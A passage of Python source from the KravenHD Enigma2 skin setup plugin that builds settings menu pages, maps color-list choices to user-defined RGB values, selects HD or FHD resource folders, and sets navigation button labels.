config.plugins.KravenHD.Primetime, _(\"Specify the time for your primetime.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Primetime-Font\"), config.plugins.KravenHD.PrimetimeFontList, _(\"Choose the font color of the primetime information. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=2\n\t\tfor i in range(emptyLines+5):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 7 (category 2)\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"NUMBERZAP ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryNumberZap, _(\"This sections offers all settings for NumberZap.\")))\n\t\tlist.append(getConfigListEntry(_(\"NumberZap-Style\"), config.plugins.KravenHD.NumberZapExt, _(\"Choose from different styles for NumberZap.\")))\n\t\tif not config.plugins.KravenHD.NumberZapExt.value == \"none\":\n\t\t\tlist.append(getConfigListEntry(_(\"Border Color\"), config.plugins.KravenHD.NZBorderList, _(\"Choose the border color for NumberZap. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tfor i in range(emptyLines+1):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 8\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"GRAPHICALEPG ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryGraphicalEPG, _(\"This sections offers all settings for GraphicalEPG.\")))\n\t\tlist.append(getConfigListEntry(_(\"GraphicalEPG-Style\"), config.plugins.KravenHD.GraphicalEPG, _(\"Choose from different styles for GraphicalEPG.\")))\n\t\tlist.append(getConfigListEntry(_(\"Event Description Fontsize\"), config.plugins.KravenHD.GMEDescriptionSize, _(\"Choose the font size of event description.\")))\n\t\tif config.plugins.KravenHD.GraphicalEPG.value in (\"text\", \"text-minitv\"):\n\t\t\tlist.append(getConfigListEntry(_(\"Selected Event Fontcolor\"), config.plugins.KravenHD.GMESelFgList, _(\"Choose the font color of selected events for GraphicalEPG. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Selected Event Background\"), config.plugins.KravenHD.GMESelBgList, _(\"Choose the background color of selected events for GraphicalEPG. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Running Event Fontcolor\"), config.plugins.KravenHD.GMENowFgList, _(\"Choose the font color of running events for GraphicalEPG. 
Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Running Event Background\"), config.plugins.KravenHD.GMENowBgList, _(\"Choose the background color of running events for GraphicalEPG. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Border Color\"), config.plugins.KravenHD.GMEBorderList, _(\"Choose the border color for GraphicalEPG. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=5\n\t\tfor i in range(emptyLines+1):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 8 (category 2)\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"ENHANCED MOVIE CENTER ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryEMC, _(\"This section offers all settings for EMC ('EnhancedMovieCenter').\")))\n\t\tlist.append(getConfigListEntry(_(\"EMC-Style\"), config.plugins.KravenHD.EMCStyle, _(\"Choose from different styles for EnhancedMovieCenter.\")))\n\t\tlist.append(getConfigListEntry(_(\"Unwatched Color\"), config.plugins.KravenHD.UnwatchedColorList, _(\"Choose the font color of unwatched movies. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Watching Color\"), config.plugins.KravenHD.WatchingColorList, _(\"Choose the font color of movies you are currently watching. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Finished Color\"), config.plugins.KravenHD.FinishedColorList, _(\"Choose the font color of watched movies. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"EMC-Selection-Colors\"), config.plugins.KravenHD.EMCSelectionColors, _(\"Choose whether you want to customize the selection-colors for EnhancedMovieCenter.\")))\n\t\tif config.plugins.KravenHD.EMCSelectionColors.value == \"custom\":\n\t\t\tlist.append(getConfigListEntry(_(\"EMC-Listselection\"), config.plugins.KravenHD.EMCSelectionBackgroundList, _(\"Choose the background color of selection bars for EnhancedMovieCenter. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"EMC-Selection-Font\"), config.plugins.KravenHD.EMCSelectionFontList, _(\"Choose the color of the font in selection bars for EnhancedMovieCenter. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=2\n\t\tfor i in range(emptyLines+1):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 9\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"PLAYER ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryPlayers, _(\"This section offers all settings for the movie players.\")))\n\t\tlist.append(getConfigListEntry(_(\"Clock\"), config.plugins.KravenHD.PlayerClock, _(\"Choose from different options to show the clock in the players.\")))\n\t\tif config.plugins.KravenHD.PlayerClock.value == \"player-android\":\n\t\t\tlist.append(getConfigListEntry(_(\"Android-Temp-Color\"), config.plugins.KravenHD.Android2List, _(\"Choose the font color of android-clock temperature. 
Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tlist.append(getConfigListEntry(_(\"PVRState\"), config.plugins.KravenHD.PVRState, _(\"Choose from different options to display the PVR state.\")))\n\t\tfor i in range(emptyLines+1):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 9 (category 2)\n\t\temptyLines=0\n\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\":\n\t\t\tlist.append(getConfigListEntry(_(\"ANTIALIASING BRIGHTNESS ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryAntialiasing, _(\"This section offers all antialiasing settings. Distortions or color frames around fonts can be reduced by these settings.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Infobar\"), config.plugins.KravenHD.InfobarAntialias, _(\"Reduce distortions (faint/blurry) or color frames around fonts in the infobar and widgets by adjusting the antialiasing brightness.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"ECM Infos\"), config.plugins.KravenHD.ECMLineAntialias, _(\"Reduce distortions (faint/blurry) or color frames around the ECM information in the infobar by adjusting the antialiasing brightness.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Screens\"), config.plugins.KravenHD.ScreensAntialias, _(\"Reduce distortions (faint/blurry) or color frames around fonts at top and bottom of screens by adjusting the antialiasing brightness.\")))\n\t\t\temptyLines=1\n\t\tfor i in range(emptyLines):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 9 (category 3)\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"VARIOUS SETTINGS ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryVarious, _(\"This section offers various settings.\")))\n\t\tlist.append(getConfigListEntry(_(\"Screennames\"), config.plugins.KravenHD.DebugNames, _(\"Activate or deactivate small screen names for debugging purposes.\")))\n\t\tlist.append(getConfigListEntry(_(\"Icon-Font vertical position\"), config.plugins.KravenHD.KravenIconVPosition, _(\"Correct the vertical font position within some icons for the infobars and players.\")))\n\t\tfor i in range(emptyLines):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t### Assign list or self color\n\t\t# Mirror each \"...List\" choice into its working config value; the\n\t\t# \"self\" entry selects the user-defined RGB color (\"...Self\" value).\n\t\tif config.plugins.KravenHD.BackgroundListColor.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.BackgroundColor.value = config.plugins.KravenHD.BackgroundSelfColor.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.BackgroundColor.value = config.plugins.KravenHD.BackgroundListColor.value\n\t\tif config.plugins.KravenHD.InfobarBoxListColor.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.InfobarBoxColor.value = config.plugins.KravenHD.InfobarBoxSelfColor.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.InfobarBoxColor.value = config.plugins.KravenHD.InfobarBoxListColor.value\n\t\tif config.plugins.KravenHD.InfobarGradientListColor.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.InfobarGradientColor.value = config.plugins.KravenHD.InfobarGradientSelfColor.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.InfobarGradientColor.value = config.plugins.KravenHD.InfobarGradientListColor.value\n\t\tif config.plugins.KravenHD.SelectionBackgroundList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.SelectionBackground.value = config.plugins.KravenHD.SelectionBackgroundSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.SelectionBackground.value = 
config.plugins.KravenHD.SelectionBackgroundList.value\n\t\tif config.plugins.KravenHD.SelectionBackground2List.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.SelectionBackground2.value = config.plugins.KravenHD.SelectionBackground2Self.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.SelectionBackground2.value = config.plugins.KravenHD.SelectionBackground2List.value\n\t\tif config.plugins.KravenHD.SelectionBorderList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.SelectionBorder.value = config.plugins.KravenHD.SelectionBorderSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.SelectionBorder.value = config.plugins.KravenHD.SelectionBorderList.value\n\t\tif config.plugins.KravenHD.Font1List.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.Font1.value = config.plugins.KravenHD.Font1Self.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.Font1.value = config.plugins.KravenHD.Font1List.value\n\t\tif config.plugins.KravenHD.Font2List.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.Font2.value = config.plugins.KravenHD.Font2Self.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.Font2.value = config.plugins.KravenHD.Font2List.value\n\t\tif config.plugins.KravenHD.IBFont1List.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.IBFont1.value = config.plugins.KravenHD.IBFont1Self.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.IBFont1.value = config.plugins.KravenHD.IBFont1List.value\n\t\tif config.plugins.KravenHD.IBFont2List.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.IBFont2.value = config.plugins.KravenHD.IBFont2Self.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.IBFont2.value = config.plugins.KravenHD.IBFont2List.value\n\t\tif config.plugins.KravenHD.BackgroundGradientListColorPrimary.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.BackgroundGradientColorPrimary.value = config.plugins.KravenHD.BackgroundGradientSelfColorPrimary.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.BackgroundGradientColorPrimary.value = config.plugins.KravenHD.BackgroundGradientListColorPrimary.value\n\t\tif config.plugins.KravenHD.BackgroundGradientListColorSecondary.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.BackgroundGradientColorSecondary.value = config.plugins.KravenHD.BackgroundGradientSelfColorSecondary.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.BackgroundGradientColorSecondary.value = config.plugins.KravenHD.BackgroundGradientListColorSecondary.value\n\t\tif config.plugins.KravenHD.InfobarGradientListColorPrimary.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.InfobarGradientColorPrimary.value = config.plugins.KravenHD.InfobarGradientSelfColorPrimary.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.InfobarGradientColorPrimary.value = config.plugins.KravenHD.InfobarGradientListColorPrimary.value\n\t\tif config.plugins.KravenHD.InfobarGradientListColorSecondary.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.InfobarGradientColorSecondary.value = config.plugins.KravenHD.InfobarGradientSelfColorSecondary.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.InfobarGradientColorSecondary.value = config.plugins.KravenHD.InfobarGradientListColorSecondary.value\n\t\tif config.plugins.KravenHD.BackgroundAlternateListColor.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.BackgroundAlternateColor.value = config.plugins.KravenHD.BackgroundAlternateSelfColor.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.BackgroundAlternateColor.value = config.plugins.KravenHD.BackgroundAlternateListColor.value\n\t\tif config.plugins.KravenHD.InfobarAlternateListColor.value == 
\"self\":\n\t\t\tconfig.plugins.KravenHD.InfobarAlternateColor.value = config.plugins.KravenHD.InfobarAlternateSelfColor.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.InfobarAlternateColor.value = config.plugins.KravenHD.InfobarAlternateListColor.value\n\t\tif config.plugins.KravenHD.MarkedFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.MarkedFont.value = config.plugins.KravenHD.MarkedFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.MarkedFont.value = config.plugins.KravenHD.MarkedFontList.value\n\t\tif config.plugins.KravenHD.SelectionFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.SelectionFont.value = config.plugins.KravenHD.SelectionFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.SelectionFont.value = config.plugins.KravenHD.SelectionFontList.value\n\t\tif config.plugins.KravenHD.PermanentClockFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.PermanentClockFont.value = config.plugins.KravenHD.PermanentClockFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.PermanentClockFont.value = config.plugins.KravenHD.PermanentClockFontList.value\n\t\tif config.plugins.KravenHD.ECMFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.ECMFont.value = config.plugins.KravenHD.ECMFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.ECMFont.value = config.plugins.KravenHD.ECMFontList.value\n\t\tif config.plugins.KravenHD.ChannelnameFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.ChannelnameFont.value = config.plugins.KravenHD.ChannelnameFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.ChannelnameFont.value = config.plugins.KravenHD.ChannelnameFontList.value\n\t\tif config.plugins.KravenHD.PrimetimeFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.PrimetimeFont.value = config.plugins.KravenHD.PrimetimeFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.PrimetimeFont.value = config.plugins.KravenHD.PrimetimeFontList.value\n\t\tif config.plugins.KravenHD.ButtonTextList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.ButtonText.value = config.plugins.KravenHD.ButtonTextSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.ButtonText.value = config.plugins.KravenHD.ButtonTextList.value\n\t\tif config.plugins.KravenHD.AndroidList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.Android.value = config.plugins.KravenHD.AndroidSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.Android.value = config.plugins.KravenHD.AndroidList.value\n\t\tif config.plugins.KravenHD.BorderList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.Border.value = config.plugins.KravenHD.BorderSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.Border.value = config.plugins.KravenHD.BorderList.value\n\t\tif config.plugins.KravenHD.ProgressList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.Progress.value = config.plugins.KravenHD.ProgressSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.Progress.value = config.plugins.KravenHD.ProgressList.value\n\t\tif config.plugins.KravenHD.LineList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.Line.value = config.plugins.KravenHD.LineSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.Line.value = config.plugins.KravenHD.LineList.value\n\t\tif config.plugins.KravenHD.IBLineList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.IBLine.value = config.plugins.KravenHD.IBLineSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.IBLine.value = config.plugins.KravenHD.IBLineList.value\n\t\tif config.plugins.KravenHD.MiniTVBorderList.value == 
\"self\":\n\t\t\tconfig.plugins.KravenHD.MiniTVBorder.value = config.plugins.KravenHD.MiniTVBorderSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.MiniTVBorder.value = config.plugins.KravenHD.MiniTVBorderList.value\n\t\tif config.plugins.KravenHD.AnalogColorList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.AnalogColor.value = config.plugins.KravenHD.AnalogColorSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.AnalogColor.value = config.plugins.KravenHD.AnalogColorList.value\n\t\tif config.plugins.KravenHD.ChannelSelectionServiceNAList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.ChannelSelectionServiceNA.value = config.plugins.KravenHD.ChannelSelectionServiceNASelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.ChannelSelectionServiceNA.value = config.plugins.KravenHD.ChannelSelectionServiceNAList.value\n\t\tif config.plugins.KravenHD.NZBorderList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.NZBorder.value = config.plugins.KravenHD.NZBorderSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.NZBorder.value = config.plugins.KravenHD.NZBorderList.value\n\t\tif config.plugins.KravenHD.GMESelFgList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.GMESelFg.value = config.plugins.KravenHD.GMESelFgSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.GMESelFg.value = config.plugins.KravenHD.GMESelFgList.value\n\t\tif config.plugins.KravenHD.GMESelBgList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.GMESelBg.value = config.plugins.KravenHD.GMESelBgSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.GMESelBg.value = config.plugins.KravenHD.GMESelBgList.value\n\t\tif config.plugins.KravenHD.GMENowFgList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.GMENowFg.value = config.plugins.KravenHD.GMENowFgSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.GMENowFg.value = config.plugins.KravenHD.GMENowFgList.value\n\t\tif config.plugins.KravenHD.GMENowBgList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.GMENowBg.value = config.plugins.KravenHD.GMENowBgSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.GMENowBg.value = config.plugins.KravenHD.GMENowBgList.value\n\t\tif config.plugins.KravenHD.GMEBorderList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.GMEBorder.value = config.plugins.KravenHD.GMEBorderSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.GMEBorder.value = config.plugins.KravenHD.GMEBorderList.value\n\t\tif config.plugins.KravenHD.EMCSelectionBackgroundList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.EMCSelectionBackground.value = config.plugins.KravenHD.EMCSelectionBackgroundSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.EMCSelectionBackground.value = config.plugins.KravenHD.EMCSelectionBackgroundList.value\n\t\tif config.plugins.KravenHD.EMCSelectionFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.EMCSelectionFont.value = config.plugins.KravenHD.EMCSelectionFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.EMCSelectionFont.value = config.plugins.KravenHD.EMCSelectionFontList.value\n\t\tif config.plugins.KravenHD.Android2List.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.Android2.value = config.plugins.KravenHD.Android2Self.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.Android2.value = config.plugins.KravenHD.Android2List.value\n\t\tif config.plugins.KravenHD.UnwatchedColorList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.UnwatchedColor.value = config.plugins.KravenHD.UnwatchedColorSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.UnwatchedColor.value = 
config.plugins.KravenHD.UnwatchedColorList.value\n\t\tif config.plugins.KravenHD.WatchingColorList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.WatchingColor.value = config.plugins.KravenHD.WatchingColorSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.WatchingColor.value = config.plugins.KravenHD.WatchingColorList.value\n\t\tif config.plugins.KravenHD.FinishedColorList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.FinishedColor.value = config.plugins.KravenHD.FinishedColorSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.FinishedColor.value = config.plugins.KravenHD.FinishedColorList.value\n\t\tif config.plugins.KravenHD.TunerBusyList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.TunerBusy.value = config.plugins.KravenHD.TunerBusySelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.TunerBusy.value = config.plugins.KravenHD.TunerBusyList.value\n\t\tif config.plugins.KravenHD.TunerLiveList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.TunerLive.value = config.plugins.KravenHD.TunerLiveSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.TunerLive.value = config.plugins.KravenHD.TunerLiveList.value\n\t\tif config.plugins.KravenHD.TunerRecordList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.TunerRecord.value = config.plugins.KravenHD.TunerRecordSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.TunerRecord.value = config.plugins.KravenHD.TunerRecordList.value\n\t\tif config.plugins.KravenHD.TunerXtremeBusyList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.TunerXtremeBusy.value = config.plugins.KravenHD.TunerXtremeBusySelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.TunerXtremeBusy.value = config.plugins.KravenHD.TunerXtremeBusyList.value\n\t\tif config.plugins.KravenHD.IBProgressList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.IBProgress.value = config.plugins.KravenHD.IBProgressSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.IBProgress.value = config.plugins.KravenHD.IBProgressList.value\n\t\tif config.plugins.KravenHD.IBProgressBackgroundList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.IBProgressBackground.value = config.plugins.KravenHD.IBProgressBackgroundSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.IBProgressBackground.value = config.plugins.KravenHD.IBProgressBackgroundList.value\n\t\tif config.plugins.KravenHD.IBProgressBorderLineColorList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.IBProgressBorderLineColor.value = config.plugins.KravenHD.IBProgressBorderLineColorSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.IBProgressBorderLineColor.value = config.plugins.KravenHD.IBProgressBorderLineColorList.value\n\t\tif config.plugins.KravenHD.MainmenuHorTitleFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.MainmenuHorTitleFont.value = config.plugins.KravenHD.MainmenuHorTitleFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.MainmenuHorTitleFont.value = config.plugins.KravenHD.MainmenuHorTitleFontList.value\n\t\tif config.plugins.KravenHD.MainmenuHorIconColorList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.MainmenuHorIconColor.value = config.plugins.KravenHD.MainmenuHorIconColorSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.MainmenuHorIconColor.value = config.plugins.KravenHD.MainmenuHorIconColorList.value\n\n\t\t### global background\n\t\tif config.plugins.KravenHD.BackgroundColor.value == \"gradient\":\n\t\t\tself.skincolorbackgroundcolor = config.plugins.KravenHD.BackgroundGradientColorPrimary.value\n\t\telif config.plugins.KravenHD.BackgroundColor.value == 
\"texture\":\n\t\t\tself.skincolorbackgroundcolor = config.plugins.KravenHD.BackgroundAlternateColor.value\n\t\telse:\n\t\t\tself.skincolorbackgroundcolor = config.plugins.KravenHD.BackgroundColor.value\n\n\t\t### infobar background\n\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\":\n\t\t\tif config.plugins.KravenHD.InfobarGradientColor.value == \"texture\":\n\t\t\t\tself.skincolorinfobarcolor = config.plugins.KravenHD.InfobarAlternateColor.value\n\t\t\telse:\n\t\t\t\tself.skincolorinfobarcolor = config.plugins.KravenHD.InfobarGradientColor.value\n\t\telse:\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skincolorinfobarcolor = config.plugins.KravenHD.InfobarGradientColorPrimary.value\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skincolorinfobarcolor = config.plugins.KravenHD.InfobarAlternateColor.value\n\t\t\telse:\n\t\t\t\tself.skincolorinfobarcolor = config.plugins.KravenHD.InfobarBoxColor.value\n\n\t\t### folders and factor\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tself.data = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/HD/\"\n\t\t\tself.templates = \"/usr/share/enigma2/KravenHD/templates/hd/\"\n\t\t\tself.factor = 1\n\t\telse:\n\t\t\tself.data = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/FHD/\"\n\t\t\tself.templates = \"/usr/share/enigma2/KravenHD/templates/fhd/\"\n\t\t\tself.factor = 1.5\n\t\tself.graphics = \"/usr/share/enigma2/KravenHD/graphics/\"\n\n\t\t### Build list and define situation\n\t\tself[\"config\"].list = list\n\t\tself[\"config\"].l.setList(list)\n\t\tself.updateHelp()\n\t\tself.showRedText()\n\t\tself[\"helperimage\"].hide()\n\t\tself.ShowPicture()\n\t\toption = self[\"config\"].getCurrent()[1]\n\t\tposition = self[\"config\"].instance.getCurrentIndex()\n\n\t\tif position == 0: # about\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"various\"))\n\t\t\tself[\"key_blue\"].setText(_(\"profiles\") + \" >>\")\n\t\tif (2 <= position <= 4): # profiles\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"about\"))\n\t\t\tself[\"key_blue\"].setText(_(\"system\") + \" >>\")\n\t\tif (6 <= position <= 17): # system\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"profiles\"))\n\t\t\tself[\"key_blue\"].setText(_(\"global colors\") + \" >>\")\n\t\tif (18 <= position <= 35): # global colors\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"system\"))\n\t\t\tself[\"key_blue\"].setText(_(\"infobar-look\") + \" >>\")\n\t\tif (36 <= position <= 53): # infobar-look\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"global colors\"))\n\t\t\tself[\"key_blue\"].setText(_(\"infobar-contents\") + \" >>\")\n\t\tif (54 <= position <= 64): # infobar-contents\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"infobar-look\"))\n\t\t\tself[\"key_blue\"].setText(_(\"weather\") + \" >>\")\n\t\tif (72 <= position <= 81): # weather\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"infobar-contents\"))\n\t\t\tself[\"key_blue\"].setText(_(\"clock\") + \" >>\")\n\t\tif (83 <= position <= 85): # clock\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"weather\"))\n\t\t\tself[\"key_blue\"].setText(_(\"ECM infos\") + \" >>\")\n\t\tif (90 <= position <= 94): # ecm infos\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"clock\"))\n\t\t\tself[\"key_blue\"].setText(_(\"views\") + \" >>\")\n\t\tif (96 <= position <= 107): # views\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"ECM infos\"))\n\t\t\tself[\"key_blue\"].setText(_(\"channellist\") + \" >>\")\n\t\tif (108 
<= position <= 116): # channellist\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"views\"))\n\t\t\tself[\"key_blue\"].setText(_(\"NumberZap\") + \" >>\")\n\t\tif (122 <= position <= 124): # numberzap\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"channellist\"))\n\t\t\tself[\"key_blue\"].setText(_(\"GraphicalEPG\") + \" >>\")\n\t\tif (126 <= position <= 133): # graphicalepg\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"NumberZap\"))\n\t\t\tself[\"key_blue\"].setText(_(\"EMC\") + \" >>\")\n\t\tif (135 <= position <= 143): # emc\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"GraphicalEPG\"))\n\t\t\tself[\"key_blue\"].setText(_(\"player\") + \" >>\")\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif (144 <= position <= 147): # player\n\t\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"EMC\"))\n\t\t\t\tself[\"key_blue\"].setText(_(\"various\") + \" >>\")\n\t\telse:\n\t\t\tif (144 <= position <= 147): # player\n\t\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"EMC\"))\n\t\t\t\tself[\"key_blue\"].setText(_(\"antialiasing\") + \" >>\")\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif (149 <= position <= 151): # various\n\t\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"player\"))\n\t\t\t\tself[\"key_blue\"].setText(_(\"about\") + \" >>\")\n\t\telse:\n\t\t\tif (149 <= position <= 152): # antialiasing\n\t\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"player\"))\n\t\t\t\tself[\"key_blue\"].setText(_(\"various\") + \" >>\")\n\t\t\tif (154 <= position <= 156): # various\n\t\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"antialiasing\"))\n\t\t\t\tself[\"key_blue\"].setText(_(\"about\") + \" 